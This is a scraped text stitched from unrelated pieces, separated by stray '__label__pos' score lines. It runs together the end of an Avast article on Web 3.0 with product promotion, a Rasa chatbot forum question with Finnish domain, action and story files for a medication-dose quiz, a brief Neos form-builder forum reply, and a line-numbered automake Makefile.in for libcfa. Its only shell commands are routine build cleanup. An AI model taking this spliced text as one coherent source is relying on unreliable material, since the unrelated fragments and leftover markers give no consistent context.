+ random.shuffle(self.servers)
logging.info('Started %d servers...', len(servers))
-
def input(self, type, pattern):
'''Return a cluster set of cluster inputs for the given pattern.'''
return mycloud.resource.input(type, pattern)
def output(self, type, name, shards):
return mycloud.resource.output(type, name, shards)
- def map(self, f, arglist):
+ def show_status(self):
+ return
+ for (host, port), rlog in self.log_server.message_map.items():
+ print >> sys.stderr, '(%s, %s) -- %s' % (host, port, rlog.msg)
+
+ def map(self, f, arglist, name='worker'):
assert len(arglist) > 0
idx = 0
task_queue = Queue.Queue()
- tasks = [Task(i, f, args, {})
+ tasks = [Task(name, i, f, args, {})
for i, args in enumerate(arglist)]
for t in tasks:
s.start_task(t)
if self.exceptions:
- raise Exception, '\n'.join(traceback.format_exception(*self.exceptions[0]))
+ self.log_exceptions()
+ raise ClusterException
mycloud.thread.sleep(0.1)
+ self.show_status()
+
except Queue.Empty:
pass
for t in tasks:
while not t.done:
if self.exceptions:
- raise Exception, '\n'.join(traceback.format_exception(*self.exceptions[0]))
+ self.log_exceptions()
+ raise ClusterException
mycloud.thread.sleep(0.1)
logging.info('Done.')
File src/mycloud/connections.py
View file
import logging
import ssh
import subprocess
+import threading
-class SSHConnection(object):
- connections = []
+class SSH(object):
+ connections = {}
+ connections_lock = threading.Lock()
def __init__(self, host):
self.host = host
+ self.lock = threading.Lock()
self.client = ssh.SSHClient()
self.client.set_missing_host_key_policy(ssh.AutoAddPolicy())
- self.client.connect(host)
+ self._connected = False
+
+ def _connect(self):
+ self.client.connect(self.host)
+ self._connected = True
+
+ def close(self):
+ self.client.close()
@staticmethod
def connect(host):
- c = SSHConnection(host)
- SSHConnection.connections.append(c)
- return c
+ with SSH.connections_lock:
+ if not host in SSH.connections:
+ SSH.connections[host] = SSH(host)
+
+ return SSH.connections[host]
def invoke(self, command, *args):
+ with self.lock:
+ if not self._connected:
+ self._connect()
+
logging.info('Invoking %s %s', command, args)
chan = self.client._transport.open_session()
stdin = chan.makefile('wb', 64)
@staticmethod
def shutdown():
- for connection in SSHConnection.connections:
- logging.info('Closing SSH connection to %s', connection.host)
- connection.client.close()
+ logging.info('Closing all SSH connections')
+ for connection in SSH.connections.values():
+ connection.close()
-class LocalConnection(object):
+class Local(object):
@staticmethod
def connect(host):
- return LocalConnection()
+ return Local()
def invoke(self, command, *args):
p = subprocess.Popen([command] + list(args),
return (p.stdin, p.stdout, p.stderr)
-atexit.register(SSHConnection.shutdown)
+atexit.register(SSH.shutdown)
File src/mycloud/mapreduce.py
View file
import mycloud.merge
import mycloud.thread
import mycloud.util
-import tempfile
import types
import xmlrpclib
return r
-def identity_mapper(k, v):
- yield k, v
+def identity_mapper(k, v, output):
+ output(k, v)
-def identity_reducer(k, values):
+def identity_reducer(k, values, output):
for v in values:
- yield k, v
+ output(k, v)
-def sum_reducer(k, values):
- yield k, sum(values)
+def sum_reducer(k, values, output):
+ output(k, sum(values))
class MRHelper(object):
def __init__(self,
tmp_prefix,
num_mappers,
num_reducers,
- map_buffer_size=1000,
+ map_buffer_size=100,
reduce_buffer_size=100e6):
self.mapper = mapper
self.reducer = reducer
self.flush()
def flush(self, final=False):
- logging.info('Flushing map %d', self.index)
for shard in range(self.num_reducers):
shard_output = self.output_tmp[shard]
- logging.info('Writing to reducer')
+ if not final and not shard_output:
+ continue
+
self.reducers[shard].invoke('write_map_output',
self.index,
json.dumps(shard_output),
self.output_tmp.clear()
self.buffer_size = 0
- logging.info('Flush finished.')
+ logging.info('Flushed map %d', self.index)
def run(self):
logging.info('Reading from: %s', self.input)
else:
mapper = self.mapper
- for k, v in self.input.reader():
-# logging.info('Reading %s', k)
- for mk, mv in mapper(k, v):
-# logging.info('Writing %s', k)
- self.output(mk, mv)
+ reader = self.input.reader()
+ for k, v in reader:
+ #logging.info('Read %s', k)
+ mapper(k, v, self.output)
+ #logging.info('Mapped %s', k)
self.flush(final=True)
+ logging.info('Map of %s finished.', self.input)
class ReduceHelper(MRHelper):
self.thread = None
def write_map_output(self, mapper, block, is_finished):
- logging.info('Reading from mapper %d - done? %d', mapper, is_finished)
if is_finished:
self.maps_finished[mapper] = 1
self.flush()
def flush(self):
- logging.info('Flushing...')
+ logging.info('Reducer flushing - %s', self.buffer_size)
- tf = tempfile.NamedTemporaryFile(suffix='reducer-tmp')
+ tf = mycloud.util.create_tempfile(dir=self.tmp_prefix,
+ suffix='reducer-tmp')
bt = blocked_table.TableBuilder(tf.name)
self.buffer.sort()
for k, v in self.buffer:
del bt
self.map_tmp.append(tf)
-
+ self.buffer_size = 0
logging.info('Flush finished to %s', tf.name)
def start_server(self):
+ logging.info('Starting server...')
self.proxy_server = mycloud.util.ProxyServer()
self.serving_thread = mycloud.thread.spawn(self.proxy_server.serve_forever)
logging.info('Reducing over %s temporary map inputs.', len(inputs))
for k, v in mycloud.merge.Merger(inputs):
# logging.info('REDUCE: %s %s', k, v)
- for rk, rv in reducer(k, v):
- out.add(rk, rv)
+ reducer(k, v, out.add)
logging.info('Returning output: %s', self.output)
reducer=self.reducer,
num_mappers=len(self.input),
num_reducers=len(self.output),
- tmp_prefix=self.cluster.fs_prefix + '/tmp/mr')
+ tmp_prefix=self.cluster.tmp_prefix)
for i in range(len(self.output)) ]
reduce_tasks = self.cluster.map(lambda r: r.start_server(), reducers)
reducer=self.reducer,
num_mappers=len(self.input),
num_reducers=len(self.output),
- tmp_prefix=self.cluster.fs_prefix + '/tmp/mr')
+ tmp_prefix=self.cluster.tmp_prefix)
for i in range(len(self.input)) ]
self.cluster.map(lambda m: m.run(), mappers)
File src/mycloud/util.py
View file
#!/usr/bin/env python
+from SimpleXMLRPCServer import SimpleXMLRPCServer
+from SocketServer import UDPServer
from cloud.serialization import cloudpickle
-from SocketServer import ThreadingMixIn
-from SimpleXMLRPCServer import SimpleXMLRPCServer
import cPickle
import logging
-import mycloud.thread
+import os
import socket
-import sys
+import struct
+import tempfile
+import time
import traceback
import types
import xmlrpclib
-class StreamLogger(object):
- '''Read lines from a file object in a separate thread.
-
- These are then logged on the local host with a given prefix.'''
- def __init__(self, prefix, buffer=True):
- self.prefix = prefix
- self.buffer = buffer
- self.lines = []
+def create_tempfile(dir, suffix):
+ os.system("mkdir -p '%s'" % dir)
+ return tempfile.NamedTemporaryFile(dir=dir, suffix=suffix)
- def start(self, stream):
- self.thread = mycloud.thread.spawn(self.run, stream)
+class LoggingServer(UDPServer):
+ log_output = ""
- def run(self, stream):
- while 1:
- line = stream.readline()
- if not line:
- break
+ def __init__(self, cluster):
+ host = '0.0.0.0'
+ port = logging.handlers.DEFAULT_UDP_LOGGING_PORT
- if not self.buffer:
- print >> sys.stderr, self.prefix + ' --- ' + line.strip()
+ UDPServer.__init__(self, (host, port), None)
+ self.timeout = 0.1
+ self.cluster = cluster
- self.lines.append(line.strip())
+ # for each distinct host, keep track of the last message sent
+ self.message_map = {}
- def dump(self):
- return (self.prefix + ' --- ' +
- ('\n' + self.prefix + ' --- ').join(self.lines))
+ def server_bind(self):
+ logging.info('LoggingServer binding to address %s', self.server_address)
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+ UDPServer.server_bind(self)
- def join(self):
- self.thread.wait()
+ def finish_request(self, request, client_address):
+ packet, socket = request
+
+ rlen = struct.unpack('>L', packet[:4])[0]
+
+ if len(packet) != rlen + 4:
+ logging.error('Received invalid logging packet. %s %s',
+ len(packet), rlen)
+
+ record = logging.makeLogRecord(cPickle.loads(packet[4:]))
+ srchost = client_address[0]
+
+ self.message_map[client_address] = record
+
+ if record.exc_info:
+ self.cluster.report_exception(record.exc_info)
+# logging.info('Exception from %s.', srchost)
+ else:
+ record.msg = 'Remote(%s) -- ' % srchost + record.msg
+# logging.getLogger().handle(record)
def to_tuple(arglist):
self.value = value
self.tb = traceback.format_exc(tb)
-class XMLServer(ThreadingMixIn, SimpleXMLRPCServer):
+class XMLServer(SimpleXMLRPCServer):
def __init__(self, *args, **kw):
SimpleXMLRPCServer.__init__(self, *args, **kw)
+ def _dispatch(self, method, params):
+ try:
+ return getattr(self, method)(*params)
+ except:
+ logging.exception('Error during dispatch!')
+ return xmlrpclib.Fault('Error while invoking method.',
+ '\n'.join(traceback.format_exc()))
+
def server_bind(self):
logging.info('Binding to address %s', self.server_address)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
SimpleXMLRPCServer.server_bind(self)
- def handle_request(self):
- try:
- SimpleXMLRPCServer.handle_request(self)
- except:
- logging.exception('Failed to handle request.')
-
-class ProxyServer(SimpleXMLRPCServer):
+class ProxyServer(XMLServer):
def __init__(self):
self.wrapped_objects = {}
- SimpleXMLRPCServer.__init__(self, ('0.0.0.0', find_open_port()))
-
- def _dispatch(self, method, params):
- return getattr(self, method)(*params)
+ XMLServer.__init__(self, ('0.0.0.0', find_open_port()))
def wrap(self, obj):
self.wrapped_objects[id(obj)] = obj
logging.info('Wrapped id %s', id(obj))
- return ProxyObject(self.server_address[0],
- self.server_address[1],
- id(obj))
+ return ProxyObject(socket.gethostname(), self.server_address[1], id(obj))
def invoke(self, objid, method, *args, **kw):
- #logging.info('Invoking %s %s %s %s',
- # self.wrapped_objects[objid], method, args, kw)
- return xmlrpclib.Binary(
- cloudpickle.dumps(
- getattr(self.wrapped_objects[objid], method)(*args, **kw)))
+ try:
+ logging.debug('Invoking object method...')
+ result = getattr(self.wrapped_objects[objid], method)(*args, **kw)
+ logging.debug('Success.')
+ return xmlrpclib.Binary(cloudpickle.dumps(result))
+ except:
+ logging.exception('Error during invocation!')
+ return xmlrpclib.Fault('Error while invoking method.',
+ '\n'.join(traceback.format_exc()))
class ProxyObject(object):
self.server = None
def get_server(self):
-# logging.info('Connecting to %s %d', self.host, self.port)
- if not self.server:
- self.server = xmlrpclib.ServerProxy('http://%s:%d' % (self.host, self.port),
- allow_none=True)
-# logging.info('Connection established to %s %d', self.host, self.port)
+ if self.server is None:
+# logging.info('Connecting to %s %d', self.host, self.port)
+ self.server = xmlrpclib.ServerProxy('http://%s:%d' % (self.host, self.port))
+# logging.info('Connection established to %s %d', self.host, self.port)
return self.server
def invoke(self, method, *args, **kw):
- return cPickle.loads(
- self.get_server().invoke(self.objid, method, *args, **kw).data)
+ for i in range(10):
+ try:
+ result = self.get_server().invoke(self.objid, method, *args, **kw)
+ return cPickle.loads(result.data)
+ except:
+ logging.exception('Failed to invoke remote method %s; trying again.' % method)
+ time.sleep(5)
+ raise Exception('Failed to invoke remote method %s on %s' % (method, self.host))
File src/mycloud/worker.py
View file
#!/usr/bin/env python
+
from cloud.serialization import cloudpickle
+from mycloud.util import XMLServer
+import argparse
import cPickle
-import cStringIO
import logging
import mycloud.thread
import mycloud.util
+import os
import select
import socket
import sys
-import threading
import time
import xmlrpclib
__doc__ = '''Worker for executing cluster tasks.'''
+def watchdog(worker):
+ while 1:
+ r, w, x = select.select([sys.stdin], [], [sys.stdin], 1)
+ if r or x:
+ logging.info('Lost controller. Exiting.')
+ os._exit(1)
-class Worker(object):
- def __init__(self, host, port):
- self.host = host
- self.port = port
+class Worker(XMLServer):
+ def __init__(self, *args, **kw):
+ XMLServer.__init__(self, *args, **kw)
+
+ self.host = socket.gethostname()
+ self.port = self.server_address[1]
self.last_keepalive = time.time()
+ logging.info('Worker starting on %s:%s', self.host, self.port)
+
def execute_task(self, pickled):
- f, args, kw = cPickle.loads(pickled.data)
- logging.info('Executing task %s %s %s', f, args, kw)
- result = f(*args, **kw)
- dump = cloudpickle.dumps(result)
-# logging.info('Got result!')
- return xmlrpclib.Binary(dump)
+ try:
+ f, args, kw = cPickle.loads(pickled.data)
+ logging.info('Executing task %s %s %s', f, args, kw)
+ result = f(*args, **kw)
+ dump = cloudpickle.dumps(result)
+ logging.info('Got result!')
+ return xmlrpclib.Binary(dump)
+ except:
+ logging.info('Failed to execute task.', exc_info=1)
+ raise
def healthcheck(self):
self.last_keepalive = time.time()
return 'alive'
-def dump_stderr(src, dst):
- while 1:
- data = src.get_value()
- src.truncate()
- dst.write(data)
- mycloud.thread.sleep(1)
+if __name__ == '__main__':
+ p = argparse.ArgumentParser()
+ p.add_argument('--index', type=int)
+ p.add_argument('--logger_host', type=str)
+ p.add_argument('--logger_port', type=int)
+ p.add_argument('--worker_name', type=str, default='worker')
+ opts = p.parse_args()
-if __name__ == '__main__':
+ index = opts.index
myport = mycloud.util.find_open_port()
- logging.basicConfig(stream=sys.stderr,
- #filename='/tmp/worker.%d.log' % myport,
+ log_prefix = '/tmp/%s-worker-%03d' % (socket.gethostname(), index)
+
+ logging.basicConfig(stream=open(log_prefix + '.log', 'w'),
format='%(asctime)s %(funcName)s %(message)s',
level=logging.INFO)
- # Open a server on an open port, and inform our caller
- old_stderr = sys.stderr
- sys.stderr = cStringIO.StringIO()
+ if opts.logger_host:
+ logging.info('Additionally logging to %s:%s',
+ opts.logger_host, opts.logger_port)
- stderr_log = threading.Thread(target=dump_stderr, args=(sys.stderr, old_stderr))
- stderr_log.setDaemon(True)
- stderr_log.start()
+ logging.getLogger().addHandler(
+ logging.handlers.DatagramHandler(opts.logger_host, opts.logger_port))
- xmlserver = mycloud.util.XMLServer(('0.0.0.0', myport), allow_none=True)
- xmlserver.timeout = 1
-
- worker = Worker(socket.gethostname(), myport)
-
- xmlserver.register_function(worker.execute_task, 'execute_task')
- xmlserver.register_function(worker.healthcheck, 'healthcheck')
+ worker = Worker(('0.0.0.0', myport))
+ worker.timeout = 1
print myport
sys.stdout.flush()
+ # redirect stdout and stderr to local files to avoid pipe/buffering issues
+ # with controller
+ sys.stdout = open(log_prefix + '.out', 'w')
+ sys.stderr = open(log_prefix + '.err', 'w')
+
+ mycloud.thread.spawn(watchdog, worker)
+
# handle requests until we lose our stdin connection the controller
try:
while 1:
- xmlserver.handle_request()
-
- r, w, x = select.select([sys.stdin], [], [sys.stdin], 0)
- if r or x:
- break
+ worker.handle_request()
except:
logging.info('Error while serving.', exc_info=1)
+
logging.info('Shutting down.')
File tests/test_mapreduce.py
View file
import sys
import unittest
-def map_identity(k, v):
- yield (k, v)
-
-def reduce_sum(k, values):
- #logging.info('%s %s', k, values)
- yield (k, sum(values))
-
class MapReduceTestCase(unittest.TestCase):
def testSimpleMapper(self):
- cluster = mycloud.Cluster([('localhost', 4)])
+ cluster = mycloud.Cluster([('localhost', 4)], tmp_prefix='/tmp')
input_desc = [mycloud.resource.SequenceFile(range(100)) for i in range(10)]
output_desc = [mycloud.resource.MemoryFile() for i in range(1)]
mr = mycloud.mapreduce.MapReduce(cluster,
- map_identity,
- reduce_sum,
+ mycloud.mapreduce.identity_mapper,
+ mycloud.mapreduce.sum_reducer,
input_desc,
output_desc)
result = mr.run()
self.assertEqual(v, j * 10)
def testShardedOutput(self):
- cluster = mycloud.Cluster([('localhost', 4)])
+ cluster = mycloud.Cluster([('localhost', 4)], tmp_prefix='/tmp')
input_desc = [mycloud.resource.SequenceFile(range(100)) for i in range(10)]
output_desc = [mycloud.resource.MemoryFile() for i in range(5)]
mr = mycloud.mapreduce.MapReduce(cluster,
- map_identity,
- reduce_sum,
+ mycloud.mapreduce.identity_mapper,
+ mycloud.mapreduce.sum_reducer,
input_desc,
output_desc)
result = mr.run()
|
__label__pos
| 0.996348 |
Nifty Images User Guide
Nifty Images
Nifty Images is our latest plugin exclusively for use on GatorCreator email templates. It enables you to add personalisation to images in your email campaigns, based on mapped fields from your CRM or data held within GatorMail.
Start with your email template
First you'll need to create your email template in GatorCreator. Once you've added your images, simply click on the one you wish to personalise to begin.
1. Enables you to create an animated countdown
2. Enables you to add personalisation to your images
Create Countdown
Please note: Outlook does not support the full dynamic countdown, a static countdown that refreshes on open will show
Once you've selected an area to add a countdown timer to, click 'create countdown'. A window will pop up with the options below:
1. Select your background colour, either by adding a hex code or using the colour pallette
2. Select a font
3. Select your font size
4. Select your font colour, either by adding a hex code or using the colour pallette
5. Live preview
6. Choose 'back' to cancel
7. Once you have finished, click 'save'
Create Personalised Image
Once you've selected an image to personalise, click 'personalize'. A window will pop up with the options below:
1. Change text enables you to add your copy to the image
2. Font style: select the font from the dropdown and size
3. Text format: select alignment, fit, bold, italic or underline
4. Change colour: choose your font colour using the pallette selection tool, a hex code or intelligent colour scheme selection based on your image, plus opacity
5. Alignment: select vertical and horizontal alignments
6. Min/Max: if you need to limit the characters in the image, you can do so here
7. Rotate/Skew: use the adjustment tools to change the angle of your text
8. Save when you're done (please note: you can't go back and edit your image futher at this point)
9. Preview: check how your end result will look with personalisation added
10. Real time preview of your image
Preview Personalised Image
Preview your image with personalisation.
1. Type anything here to see it populate the image below
2. Use the randomiser to populate the field in your personalised image
When you're happy, click save
If you want to make more changes, click 'back'
0 Comments
Add your comment
E-Mail me when someone replies to this comment
|
__label__pos
| 0.866982 |
New book: CLR via C#, Third Edition
9780735627048f Hey, everybody: Jeffrey Richter’s CLR via C#, Third Edition, is indeed now available! You can order it here or here (and lots of other places too, of course).
Today we’d like to share an excerpt from the book. We’ll continue excerpting this chapter over the coming weeks and months. Enjoy.
Chapter 16
Arrays
In this chapter:
Initializing Array Elements . 388
Casting Arrays . 390
All Arrays Are Implicitly Derived from System.Array . 392
All Arrays Implicitly Implement IEnumerable, ICollection, and IList . 393
Passing and Returning Arrays . 394
Creating Non-Zero–Lower Bound Arrays . 395
Array Access Performance . 396
Unsafe Array Access and Fixed-Size Array . 401
Arrays are mechanisms that allow you to treat several items as a single collection. The
Microsoft .NET common language runtime (CLR) supports single-dimensional arrays, multidimensional
arrays, and jagged arrays (that is, arrays of arrays). All array types are implicitly
derived from the System.Array abstract class, which itself is derived from System.Object.
This means that arrays are always reference types that are allocated on the managed heap
and that your application’s variable or field contains a reference to the array and not the
elements of the array itself. The following code makes this clearer:
Int32[] myIntegers; // Declares a reference to an array
myIntegers = new Int32[100]; // Creates an array of 100 Int32s
On the first line, myIntegers is a variable that’s capable of pointing to a single-dimensional
array of Int32s. Initially, myIntegers will be set to null because I haven’t allocated an
an array. The second line allocates an array of 50 Control references; all of these references
are initialized to null. Because Control is a reference type, creating the array creates only a
bunch of references; the actual objects aren’t created at this time. The address of this memory
block is returned and saved in the variable myControls.
Figure 16-1 shows how arrays of value types and arrays of reference types look in the
managed heap.
image
In the figure, the Controls array shows the result after the following lines have executed:
myControls[1] = new Button();
myControls[2] = new TextBox();
myControls[3] = myControls[2]; // Two elements refer to the same object.
myControls[46] = new DataGrid();
myControls[48] = new ComboBox();
myControls[49] = new Button();
Common Language Specification (CLS) compliance requires all arrays to be zero-based. This
allows a method written in C# to create an array and pass the array’s reference to code written
in another language, such as Microsoft Visual Basic .NET. In addition, because zero-based
arrays are, by far, the most common arrays, Microsoft has spent a lot of time optimizing their
performance. However, the CLR does support non-zero–based arrays even though their use
is discouraged. For those of you who don’t care about a slight performance penalty or cross-
language portability, I’ll demonstrate how to create and use non-zero–based arrays later in
this chapter.
Notice in Figure 16-1 that each array has some additional overhead information associated
with it. This information contains the rank of the array (number of dimensions), the lower
bounds for each dimension of the array (almost always 0), and the length of each dimension.
The overhead also contains the array’s element type. I’ll mention the methods that allow you
to query this overhead information later in this chapter.
So far, I’ve shown examples demonstrating how to create single-dimensional arrays. When
possible, you should stick with single-dimensional, zero-based arrays, sometimes referred
to as SZ arrays, or vectors. Vectors give the best performance because you can use specific
Intermediate Language (IL) instructions—such as newarr, ldelem, ldelema, ldlen, and
stelem—to manipulate them. However, if you prefer to work with multi-dimensional arrays,
you can. Here are some examples of multi-dimensional arrays:
// Create a two-dimensional array of Doubles.
Double[,] myDoubles = new Double[10, 20];
// Create a three-dimensional array of String references.
String[,,] myStrings = new String[5, 3, 10];
The CLR also supports jagged arrays, which are arrays of arrays. Zero-based, singledimensional
jagged arrays have the same performance as normal vectors. However, accessing
the elements of a jagged array means that two or more array accesses must occur. Here are
some examples of how to create an array of polygons with each polygon consisting of an
array of Point instances:
// Create a single-dimensional array of Point arrays.
Point[][] myPolygons = new Point[3][];
// myPolygons[0] refers to an array of 10 Point instances.
myPolygons[0] = new Point[10];
// myPolygons[1] refers to an array of 20 Point instances.
myPolygons[1] = new Point[20];
// myPolygons[2] refers to an array of 30 Point instances.
myPolygons[2] = new Point[30];
// Display the Points in the first polygon.
for (Int32 x = 0; x < myPolygons[0].Length; x++)
Console.WriteLine(myPolygons[0][x]);
Note The CLR verifies that an index into an array is valid. In other words, you can’t create an
array with 100 elements in it (numbered 0 through 99) and then try to access the element at
index –5 or 100. Doing so will cause a System.IndexOutOfRangeException to be thrown.
Allowing access to memory outside the range of an array would be a breach of type safety and
a potential security hole, and the CLR doesn’t allow verifiable code to do this. Usually, the performance
degradation associated with index checking is insubstantial because the just-in-time
(JIT) compiler normally checks array bounds once before a loop executes instead of at each loop
iteration. However, if you’re still concerned about the performance hit of the CLR’s index checks,
you can use unsafe code in C# to access the array. The “Array Access Performance” section later
in this chapter demonstrates how to do this.
Initializing Array Elements
In the previous section, I showed how to create an array object and then I showed how to
initialize the elements of the array. C# offers syntax that allows you to do these two operations
in one statement. For example:
String[] names = new String[] { “Aidan”, “Grant” };
The comma-separated set of tokens contained within the braces is called an array initializer.
Each token can be an arbitrarily complex expression or, in the case of a multi-dimensional array,
a nested array initializer. In the example above, I used just two simple String expressions.
If you are declaring a local variable in a method to refer to the initialized array, then you can
use C#’s implicitly typed local variable (var) feature to simplify the code a little:
// Using C#’s implicitly typed local variable feature:
var names = new String[] { “Aidan”, “Grant” };
Here, the compiler is inferring that the names local variable should be of the String[] type
since that is the type of the expression on the right of the assignment operator (=).
You can use C#’s implicitly typed array feature to have the compiler infer the type of the
array’s elements. Notice the line below has no type specified between new and []:
// Using C#’s implicitly typed local variable and implicitly typed array features:
var names = new[] { “Aidan”, “Grant”, null };
In the line above, the compiler examines the types of the expressions being used inside the
array to initialize the array’s elements, and the compiler chooses the closest base class that
all the elements have in common to determine the type of the array. In this example, the
compiler sees two Strings and null. Since null is implicitly castable to any reference type
(including String), the compiler infers that it should be creating and initializing an array of
String references.
If you had this code,
// Using C#’s implicitly typed local variable & implicitly typed array features: (error)
var names = new[] { “Aidan”, “Grant”, 123 };
the compiler would issue the message “error CS0826: No best type found for
implicitly-typed array.” This is because the base type in common between the two
Strings and the Int32 is Object, which would mean that the compiler would have to create
an array of Object references and then box the 123 and have the last array element refer to
a boxed Int32 with a value of 123. The C# compiler team thinks that boxing array elements
is too heavy-handed for the compiler to do for you implicitly, and that is why the compiler
issues the error.
As an added syntactical bonus when initializing an array, you can write the following:
String[] names = { “Aidan”, “Grant” };
Notice that on the right of the assignment operator (=), only the array initializer expression is
given with no new, no type, and no []s. This syntax is nice, but unfortunately, the C#
compiler does not allow you to use implicitly typed local variables with this syntax:
// This is a local variable now (error)
var names = { “Aidan”, “Grant” };
If you try to compile the line of code above, the compiler issues two messages: “error
CS0820: Cannot initialize an implicitly-typed local variable with an array
initializer” and “error CS0622: Can only use array initializer expressions to
assign to array types. Try using a new expression instead.” While the compiler
could make this work, the C# team thought that the compiler would be doing too much for
you here. It would be inferring the type of the array, new’ing the array, initializing the array,
and inferring the type of the local variable, too.
The last thing I’d like to show you is how to use implicitly typed arrays with anonymous types
and implicitly typed local variables. Anonymous types and how type identity applies to them
are discussed in Chapter 10, “Properties.” Examine the code below:
// Using C#’s implicitly typed local, implicitly typed array, and anonymous type features:
var kids = new[] {new { Name=”Aidan” }, new { Name=”Grant” }};
// Sample usage (with another implicitly typed local variable):
foreach (var kid in kids)
Console.WriteLine(kid.Name);
In this example, I am using an array initializer that has two expressions for the array elements.
Each expression represents an anonymous type (since no type name is specified after the new
operator). Since the two anonymous types have the identical structure (one field called Name
of type String), the compiler knows that these two objects are of the exact same type. Now,
I use C#’s implicitly typed array feature (no type specified between the new and the []s) so
that the compiler will infer the type of the array itself, construct this array object, and initialize
its references to the two instances of the one anonymous type.1 Finally, a reference to this
array object is assigned to the kids local variable, the type of which is inferred by the compiler
due to C#’s implicitly typed local variable feature.
I show the foreach loop as an example of how to use this array that was just created and initialized
with the two anonymous type objects. I have to use an implicitly typed local variable
(kid) for the loop, too. When I run this code, I get the following output:
Aidan
Grant
Comments (5)
1. grnemo says:
The book is not at pre-order any more, but we have not heard from Amazon since they had informed us, that the dispatching day has changed. My order remains open (after the preorder period ended) and they seem to blame the publisher for the delays.
2. Steve Weiss says:
Hello Aggelos,
Ah yes; it’s a database-driven world in which we live…
What appears to have happened is that the book became available through our wholesale distributor (Ingram) *before* Amazon officially received it in their own distribution centers.
In the rare cases where this happens, Amazon would usually have the book shipped from the wholesaler directly to you, rather than wait and ship to you from their own warehouse(s) when the books arrive, which should be any day now if they haven’t arrived already.
In short: It’s all in the name of having the systems calibrated to deliver the book to you as soon as possible; it’s just that the systems don’t always express this intent as eloquently as possible.
Sorry for the hassle, and let me know if the book hasn’t arrived by later today (Friday, Feb 19) or if you’ve not received further communications from Amazon. One way or another, we’ll get you that book!
Thanks,
–Steve Weiss
Associate Publisher, O’Reilly Media / Microsoft Press Division
steve(at)oreilly.com
3. Marius says:
I have ordered the book from the microsoft-press.co.uk.
I have received an update on 19’th of february 2010 that the order has not yet been dispatched. I notice that microsoft-press.co.uk is down. what is happening?
4. MAfshin says:
Please help me, how can I request a translation permission from MS Press for this book?
5. MAfshin, write to Sharon Payne at O’Reilly: sharon [at] oreilly.co.uk
Skip to main content
|
__label__pos
| 0.81662 |
How does FractalScapes work
FractalScapes is an L-System fractal generator. L-Systems is basically a graphics language with very simple rules. In most L-Systems, drawing rules are represented by letters of the alphabet such as "F" meaning draw a line. FractalScapes has replaced the letters with icons so in FractalScapes,
draw a line is represented by the icon: kBIconRuleDrawLine
Turn left is kBIconRuleRotateCC.
Turn right is kBIconRuleRotateC.
By putting the rules in sequence, you tell the application what to draw. so the sequence:
kBIconRuleDrawLinekBIconRuleRotateCC kBIconRuleDrawLinekBIconRuleRotateCkBIconRuleDrawLine
Draws a horizontal line connected to a upward vertical line connected to a rightward horizontal line.
Every l-system fractal starts with an initial sequence of rules which can be like the one above and the starting rules are labeled "Start" in the app editor. You can draw all sorts of shapes with curves, fills and lines but that is not the cool part. The cool part happens next. With "Replacement Rules" see the "Replacement Rules" in the FAQ.
Add comment
You can add a comment by filling out the form below. Plain text formatting. Comments are moderated.
|
__label__pos
| 0.657144 |
Jump to content
• Log In with Google Sign In
• Create Account
Banner advertising on our site currently available from just $5!
1. Learn about the promo. 2. Sign up for GDNet+. 3. Set up your advert!
XNA Stencil Buffer problem, with code
Old topic!
Guest, the last post of this topic is over 60 days old and at this point you may not reply in this topic. If you wish to continue this conversation start a new topic.
• You cannot reply to this topic
4 replies to this topic
#1 danromeo Members - Reputation: 238
Like
0Likes
Like
Posted 01 September 2014 - 01:47 PM
hi.
I'm trying to create a simple stencil mask on a RenderTarget2D from a bunch of primitives, and then later draw pixels from that render target to another rendertarget in a shader based on the stencil test pass/fail. Code is below. The results that I'm getting seems to be that the stencil test either always passes every pixel or always fails every pixel, regardless of which settings I try for DepthStencilStates.
The idea is to create an overhead view of a forested world and then lay that view over the terrain when viewed from overhead rather than redrawing the forests on every frame, BUT my question is about Stencil Buffers..
I set up the following resources:
MyRenderTarget = new RenderTarget2D(graphicsDevice, mapSize, mapSize, true, SurfaceFormat.Color, DepthFormat.Depth24Stencil8, 0, RenderTargetUsage.DiscardContents);
NewRenderTarget = new RenderTarget2D(graphicsDevice, mapSize, mapSize, true, SurfaceFormat.Color, DepthFormat.Depth24Stencil8, 0, RenderTargetUsage.DiscardContents);
DepthStencilState writeStencil = new DepthStencilState()
{
StencilEnable = true,
DepthBufferEnable = false,
ReferenceStencil = 1,
StencilFunction = CompareFunction.Always,
StencilPass = StencilOperation.Replace,
};
DepthStencilState stencilMask = new DepthStencilState()
{
StencilEnable = true,
DepthBufferEnable = false,
ReferenceStencil = 0,
StencilFunction = CompareFunction.NotEqual,
StencilPass = StencilOperation.Keep,
};
During initialization to create my overhead render target with stencil I set the DepthStencilState to stencilMask and draw the forests to the rendertarget, which SHOULD give me a stencil buffer containing 0's where there are no trees and 1's where there are trees.
graphicsDevice.SetRenderTarget(MyRenderTarget);
graphicsDevice.Clear(ClearOptions.DepthBuffer | ClearOptions.Stencil | ClearOptions.Target, Microsoft.Xna.Framework.Color.Black, 1.0f, 0);
graphicsDevice.DepthStencilState = writeStencil;
foreach (EffectPass pass in effect.CurrentTechnique.Passes)
{
pass.Apply();
graphicsDevice.DrawUserIndexedPrimitives<Position4Texture>(PrimitiveType.TriangleList,
Vertices, 0, 4, Indices, 0, 2);
}
graphicsDevice.DepthStencilState = DepthStencilState.Default;
And then at render time I render my terrain, and then in a second pass I set the DepthStencilState to stencilMask and render a quad over the terrain pulling pixels from MyRenderTarget based on stencil test pass/fail:
graphicsDevice.SetRenderTarget(NewRenderTarget);
graphicsDevice.Clear(ClearOptions.DepthBuffer | ClearOptions.Stencil | ClearOptions.Target, Microsoft.Xna.Framework.Color.Black, 1.0f, 0);
graphicsDevice.DepthStencilState = DepthStencilState.Default;
< DRAW TERRAIN TO NewRenderTarget >
graphicsDevice.DepthStencilState = stencilMask;
effect.Parameters["Texture"].SetValue(MyRenderTarget);
foreach (EffectPass pass in effect.CurrentTechnique.Passes)
{
pass.Apply();
graphicsDevice.DrawUserIndexedPrimitives<Position4Texture>(PrimitiveType.TriangleList,
Vertices, 0, 4, Indices, 0, 2);
}
graphicsDevice.DepthStencilState = DepthStencilState.Default;
And in the simple pixel shader I am returning:
return = tex2D(Texture,input.TexCoord);
I've tried various settings in the DepthStencilStates, and the end result is the stencil test either always passes all pixels, giving me overhead forests with black terrain, or always fails, giving me terrain with no forests. I've never used stencil buffers before but would like to make extensive use of them. Can somebody tell me what I'm doing wrong?
THANKS
Sponsor:
#2 phil_t Crossbones+ - Reputation: 5305
Like
1Likes
Like
